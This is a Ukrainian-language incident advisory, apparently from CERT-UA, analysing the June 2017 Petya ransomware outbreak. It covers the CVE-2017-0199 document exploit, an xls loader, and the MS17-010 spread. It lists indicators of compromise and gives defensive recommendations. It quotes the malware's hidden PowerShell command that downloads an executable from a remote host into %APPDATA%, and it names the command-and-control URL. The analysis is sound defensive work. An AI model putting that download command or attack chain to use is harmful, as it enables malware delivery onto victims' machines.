Petya Ransomware Попередній Аналіз CVE-2017-0199 + MS17-010

27/06/2017

В першій половині дня розпочалася масова атака на український та комерційний сектор із застосування шкідливого програмного забезпечення, що позиціонується як Petya Ransomware


Спеціалістами команди реагування на комп’ютерні надзвичайні подій України CERT-UA був проаналізований файл: 

[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]
hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/

 

 

 

Даний файл, експлуатовував вразливість CVE-2017-0199 (https://github.com/bhdresh/CVE-2017-0199).
Після експлуатації вразливості на інфікований комп’ютер завантажувався xls-файл (hxxp://84.200.16.242/myguy.xls)
[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]
hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/

 

 

Даний xls-файл виступав в якості завантажувача та містив в собі обфускований javascript код. 


Після деобфускації коду вдалося вияснити, що за допомогою команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:
[myguy.exe][224500132b2537d599fe3314717b7ee5]

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)

Даний виконуваний файл використовувся в якості завантажувача подальшого функціоналу шифрувальника файлів Petya Ransomware.

Командно-контрольний центр: 
hххp://coffeinoffice.xyz:80/cup/wish.php 

Механізм розповсюдження був запозичений від шифрувальника файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як по локальній так і по глобальній мережі.

Після шифрування комп’ютера відбувалося перезавантаження системи, в результаті якої жертва отримувала повідомлення про викуп.
Даний тип шифрувальника пошкоджував таблицю MBR, в результаті чого завантаження операційної системи не продовжувалося.

За попередніми даними даний виконуваний файл завантажував в директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів встановлював в планувальнику задач команду на перезапуск системи. Після перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk. 


Отже, можна стверджувати, що новий підвид Petya.A, який сьогодні атакував Україну — це комбінація вразливостей

CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за результатами витоку через ShadowBrokers).

 

Перелік індикаторів компрометації:

84.200.16.242:80

french-cooking.com:443

coffeinoffice.xyz:80

File Name Order-20062017.doc (RTF із CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6

Рекомендації CERT-UA

1. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви; наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).

2. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового й веб-трафіку.

3. Установити офіційний патч MS17-010.

4. На мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP.

5. В разі інфікування персонального комп’ютера не перезавантажувати систему.

6. Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.

7. Звернутися до рекомендацій CERTUA cтосовно безпеки поштових сервісів.

8.Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec.